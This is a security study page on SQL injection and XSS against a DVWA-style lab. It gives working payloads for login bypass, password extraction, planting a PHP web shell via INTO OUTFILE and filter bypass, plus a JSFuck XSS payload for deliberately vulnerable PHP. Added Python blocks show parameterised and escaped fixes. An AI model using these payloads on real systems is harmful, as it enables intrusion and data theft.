# SQL Injection & XSS Playground

## SQL injection overview

### What is it?

SQL injection is a vulnerability in which an attacker is able to manipulate the database queries an application makes, by supplying input that ends up being interpreted as part of the query itself.

**A simple example**

* A vulnerable web application has the endpoint `/search?product={productName}`
* When a request is made, the application builds a SQL query to search for the product: `SELECT * FROM products WHERE name=$productName`
* If an attacker inserts a payload into `{productName}` such as `anything' UNION SELECT password FROM users WHERE username = 'admin` that modifies the query, sensitive data could be leaked.
* The vulnerable application sends this query to the database and the database returns the admin's password.
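The search endpoint from the example above, as an added example that is not part of the original page: the same query is built by string concatenation and by parameter binding against an in-memory SQLite database with constructed rows. The application is assumed to wrap the parameter in single quotes (the page's payload implies this), and the table columns are an assumption for the demo.

```python
"""Added example (not from the original page): the /search?product= query from
the overview, built two ways against SQLite with constructed sample rows. The
vulnerable builder splices the parameter into the SQL text, so the page's UNION
payload returns the admin password; the parameterised builder binds it as a
value, so the same input simply matches no product."""
import sqlite3

# Constructed sample data; the column layout is an assumption for this demo.
SCHEMA = """
CREATE TABLE products (name TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO products VALUES ('widget'), ('gadget');
INSERT INTO users VALUES ('admin', 'hunter2-demo'), ('bob', 'letmein-demo');
"""

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def search_vulnerable(conn, product_name):
    # Untrusted input concatenated into the query: the database parses it as SQL.
    sql = "SELECT name FROM products WHERE name = '" + product_name + "'"
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn, product_name):
    # Placeholder binding: the driver hands the input over as a value, never as SQL.
    sql = "SELECT name FROM products WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (product_name,))]

# The payload quoted in the overview above.
PAYLOAD = "anything' UNION SELECT password FROM users WHERE username = 'admin"

if __name__ == "__main__":
    db = make_db()
    print("normal :", search_vulnerable(db, "widget"))   # ['widget']
    print("vuln   :", search_vulnerable(db, PAYLOAD))    # ['hunter2-demo']
    print("safe   :", search_safe(db, PAYLOAD))          # []
```

The bound version returns nothing because the whole payload is compared against product names as one opaque string, which is exactly the property the checklist tests for when it probes with `'` and `"`.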

It's important to note that a payload or attack may change depending on the application, the query, and the database. SQL injection can often lead to:

* Sensitive data exposure
* Data manipulation
* Remote code execution
* Denial of service

**Other learning resources:**

* PortSwigger Web Security Academy: <https://portswigger.net/web-security/sql-injection>
* swisskyrepo, PayloadsAllTheThings: <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection>

**Writeups:**

* <https://infosecwriteups.com/how-i-found-multiple-sql-injections-in-5-minutes-in-bug-bounty-40155964c498>

*Have a good writeup & want to share it here? Drop me a message on LinkedIn.*

### Checklist

* [ ] What is the technology stack you're attacking?
  * [ ] What application/framework is being used?
  * [ ] What backend DB is being used?
  * [ ] Is there an ORM?
* [ ] Verify injection points
  * [ ] URL parameters
  * [ ] Form fields
  * [ ] HTTP headers (e.g. cookies)
  * [ ] Out-of-band (e.g. data retrieved from a third party)
* [ ] Test ' and "
  * [ ] Can you trigger an error?
  * [ ] Can you trigger a different response?
* [ ] Test with SQLmap
* [ ] Test for login bypass (`' and 1=1-- -` etc.)
* [ ] Test for blind SQLi
  * [ ] Test for errors
  * [ ] Test for conditional responses
  * [ ] Test for conditional errors
  * [ ] Test for time delays
* [ ] Test for out-of-band interactions
* [ ] Test for NoSQL injection
* [ ] Is there a blocklist?
  * [ ] Can you bypass the blocklist?
    * [ ] Encoding
    * [ ] Double encoding
    * [ ] Alternative characters
    * [ ] Alternative payloads
* [ ] Test for second-order SQLi

### Exploitation

```sql
# Basic login bypass
' AND 1=1#
```

```sql
# UNION SELECT
' UNION SELECT null,null FROM users-- -
```

```sql
# Blind
' AND SUBSTR((SELECT version()),1,1)='7'#
CAST((SELECT example_column FROM example_table) AS int)
```

## SQL Injection & XSS Playground

### Classic SQL Injection

#### Union Select Data Extraction

```sql
mysql> select * from users where user_id = 1 order by 7;              
ERROR 1054 (42S22): Unknown column '7' in 'order clause'
mysql> select * from users where user_id = 1 order by 6;
mysql> select * from users where user_id = 1 union select 1,2,3,4,5,6;
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXMXXwrtfQQjcZ6RBe%2F-LRXObGwHxUJnP-M3Zl2%2FScreenshot%20from%202018-11-17%2015-59-39.png?alt=media\&token=3642479d-9032-4ec4-9a2e-8954f730bd60)

```sql
select * from users where user_id = 1 union all select 1,(select group_concat(user,0x3a,password) from users),3,4,5,6;
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXMXXwrtfQQjcZ6RBe%2F-LRXPNBj8tvkuD7S8spf%2FScreenshot%20from%202018-11-17%2016-03-00.png?alt=media\&token=344cf668-8e94-4874-b521-2dba54f6e8bb)

#### Authentication Bypass

```sql
mysql> select * from users where user='admin' and password='blah' or 1 # 5f4dcc3b5aa765d61d8327deb882cf99' 
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXSBkbwqRz60W4Qw8c%2F-LRXSM-wLpz-MR1pTltH%2FScreenshot%20from%202018-11-17%2016-16-06.png?alt=media\&token=70577172-2ffb-4fde-a4d6-28628de694cc)

#### Second Order Injection

```sql
mysql> insert into accounts (username, password, mysignature) values ('admin','mynewpass',(select user())) # 'mynewsignature');
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXaBImaVskSspe9-Y9%2F-LRXapQ0X8Rl4huvnU0n%2FScreenshot%20from%202018-11-17%2016-57-24.png?alt=media\&token=925e11de-f4a2-4c69-974b-4a55ea2b503e)

#### Dropping a Backdoor

```sql
mysql> select * from users where user_id = 1 union select all 1,2,3,4,"<?php system($_REQUEST['c']);?>",6 into outfile "/var/www/dvwa/shell.php" #;
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXcY0UNCY2LUUtyXcW%2F-LRY5MXbUi_kecGjQCHt%2FScreenshot%20from%202018-11-17%2019-15-16.png?alt=media\&token=9dc016e9-8bc7-4659-9f1a-e8d636fbc448)

#### Conditional Select

```sql
mysql> select * from users where user = (select concat((select if(1>0,'adm','b')),"in"));
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRckivms3V24LOmHitj%2F-LRcl3lcp24HXsErO5wT%2FScreenshot%20from%202018-11-18%2021-39-53.png?alt=media\&token=1df11d39-1fce-4495-aadf-0f3f8a9c5bf8)

#### Bypassing Whitespace Filtering

```sql
mysql> select * from users where user_id = 1/**/union/**/select/**/all/**/1,2,3,4,5,6;
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRi850Fb4bWMb2XGxnO%2F-LRi8FAL79mB9k-5SKZ9%2FScreenshot%20from%202018-11-19%2022-43-46.png?alt=media\&token=58bbeb4d-b844-4fa5-a7df-9128c0383e18)

### Time Based SQL Injection

#### Sleep Invocation

```sql
mysql> select * from users where user_id = 1 or (select sleep(1)+1);
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXMXXwrtfQQjcZ6RBe%2F-LRXMoyg7m2ypz2wckU2%2FScreenshot%20from%202018-11-17%2015-51-50.png?alt=media\&token=86e07c05-3739-4e82-8351-96ed92c53697)

```sql
select * from users where user_id = 1 union select 1,2,3,4,5,sleep(1);
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXMXXwrtfQQjcZ6RBe%2F-LRXNFPExWv3xXXjtPtr%2FScreenshot%20from%202018-11-17%2015-53-52.png?alt=media\&token=4a9ea4d6-187d-46fa-9a64-1331edcd14b6)

### XSS

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRYJh0E49lb4ekM05MZ%2F-LRYJsNvY3OOrKKiWrsJ%2FPeek%202018-11-17%2020-17.gif?alt=media\&token=3f2d801c-74f2-4747-ac6d-b854697568e1)

#### Strtoupper Bypass

Say we have the following PHP code that takes `name` as a user supplied parameter:

```php
<?php
    $input=$_GET['name'];
    $sanitized=strtoupper(htmlspecialchars($input));
    echo '<form action="">';
    echo "First name: <input type='text' name='name' value='".$sanitized."'><br>";
    echo "<input type='submit' value='Submit form'></form>";
    echo "</HTML></body>";
?>
```

Line 3 is vulnerable to XSS: `htmlspecialchars` is called without the `ENT_QUOTES` flag (and before PHP 8.1 the default flags did not encode single quotes), while the result is then placed inside a single-quoted `value='...'` attribute, so we can break out of the input with a single quote `'`:

```php
$sanitized=strtoupper(htmlspecialchars($input));
```

For example, if we set the `name` parameter to the value of `a'`, we get:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRYLWj41O7lB0E_1zMZ%2F-LRYemANzw2Zq24HrHJy%2FScreenshot%20from%202018-11-17%2021-54-22.png?alt=media\&token=8fe26e72-7cac-44a2-9a0b-aec9fa4d5bb9)

Note that the `a` was converted to a capital `A` because `strtoupper` is called on our input. This means that any ASCII letters in a JavaScript payload are also uppercased, which makes the payload invalid so it will not execute (i.e. `alert() != ALERT()`, since JavaScript identifiers are case-sensitive).
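A Python model of the vulnerable line beside its corrected form, as an added example that is not part of the original page: `html.escape(quote=False)` stands in for `htmlspecialchars` with its old default flags (single quotes left alone), `html.escape(quote=True)` stands in for the `ENT_QUOTES` fix, and the page's `.upper()` step is kept. A small HTML parser then checks whether the untrusted value stayed inside the `value='...'` attribute, which is the check a code reviewer or a DAST rule would apply to the rendered output.

```python
"""Added example (not from the original page): models the PHP line
strtoupper(htmlspecialchars($input)). The vulnerable renderer leaves ' unencoded
inside a single-quoted attribute; the fixed renderer encodes both quote characters
(ENT_QUOTES equivalent). attribute_injected() parses the fragment and reports
whether the <input> acquired attributes beyond the three intended ones."""
import html
from html.parser import HTMLParser

def render_vulnerable(name):
    # Mirrors the page's code: quotes are not encoded, then everything is uppercased.
    sanitized = html.escape(name, quote=False).upper()
    return "First name: <input type='text' name='name' value='" + sanitized + "'><br>"

def render_fixed(name):
    # Encode ' and " as character references so the input can never close the attribute.
    # Escaping happens before upper(): &#x27; becomes &#X27;, which HTML still accepts.
    sanitized = html.escape(name, quote=True).upper()
    return "First name: <input type='text' name='name' value='" + sanitized + "'><br>"

class _AttrCollector(HTMLParser):
    """Records the (lower-cased) attribute names of every <input> the browser would see."""
    def __init__(self):
        super().__init__()
        self.input_attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.input_attrs.append(sorted(k for k, _ in attrs))

def input_attributes(fragment):
    parser = _AttrCollector()
    parser.feed(fragment)
    parser.close()
    return parser.input_attrs

def attribute_injected(fragment):
    # Breakout succeeded if any <input> carries attributes other than the intended three.
    expected = ["name", "type", "value"]
    return any(attrs != expected for attrs in input_attributes(fragment))

if __name__ == "__main__":
    probe = "a' onmouseover='x"   # constructed probe: a quote followed by an attribute name
    print(attribute_injected(render_vulnerable(probe)))  # True
    print(attribute_injected(render_fixed(probe)))       # False
```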

To bypass this constraint, we can encode our payload with JSFuck, which expresses the JavaScript using only the characters `[]()!+`, so no letters remain for `strtoupper` to break (the `onmouseover` attribute name is unaffected because HTML attribute names are case-insensitive). That leaves us with this:

```php
A' onmouseover='[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()'
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRYLWj41O7lB0E_1zMZ%2F-LRYf25HeqCaNyOBRCZt%2FScreenshot%20from%202018-11-17%2021-55-33.png?alt=media\&token=7eaf6946-6659-4d8b-ab06-4231d7ca8059)

### References

{% embed url="http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet" %}

{% embed url="https://www.youtube.com/watch?v=Rqt_BgG5YyI" %}
